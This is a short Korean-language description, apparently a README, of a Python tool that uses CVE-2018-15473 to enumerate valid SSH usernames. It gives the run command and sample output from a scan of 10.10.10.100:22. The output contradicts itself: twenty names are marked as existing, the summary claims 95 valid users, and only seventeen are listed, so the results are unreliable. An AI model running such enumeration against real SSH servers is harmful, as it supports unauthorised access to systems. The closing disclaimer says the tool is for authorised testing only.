
python 코드로 SSH에서 사용자를 확인하는 데 사용됩니다.
CVE-2018-15473을 악용하여 유효한 SSH 사용자 이름을 식별하도록 제가 개발한 Python 도구입니다.
python3 enum_ssh.py usernames.txt
여기서 usernames.txt는 테스트할 사용자 이름 목록을 포함합니다.
[parrot@parrot]-[~]
$ python3 enum_ssh.py usernames.txt
[*] Starting CVE-2018-15473 enumeration against 10.10.10.100:22
[*] Using wordlist: usernames.txt
[+] [EXISTS] -> root
[+] [EXISTS] -> admin
[+] [EXISTS] -> administrator
[+] [EXISTS] -> user
[+] [EXISTS] -> test
[+] [EXISTS] -> guest
[+] [EXISTS] -> demo
[+] [EXISTS] -> operator
[+] [EXISTS] -> sysadmin
[+] [EXISTS] -> security
[+] [EXISTS] -> netadmin
[+] [EXISTS] -> webmaster
[+] [EXISTS] -> support
[+] [EXISTS] -> service
[+] [EXISTS] -> ubuntu
[+] [EXISTS] -> debian
[+] [EXISTS] -> centos
[+] [EXISTS] -> fedora
[+] [EXISTS] -> kali
[+] [EXISTS] -> parrot
========================================
[*] Scan complete.
[*] Found 95 valid user(s):
- root
- admin
- administrator
- user
- test
- guest
- demo
- operator
- sysadmin
- security
- netadmin
- webmaster
- support
- service
- ubuntu
- debian
- centos
========================================
이 도구는 교육 목적 및 승인된 보안 테스트 전용으로 제작되었습니다. 명시적 권한이 있는 시스템에서만 사용하십시오.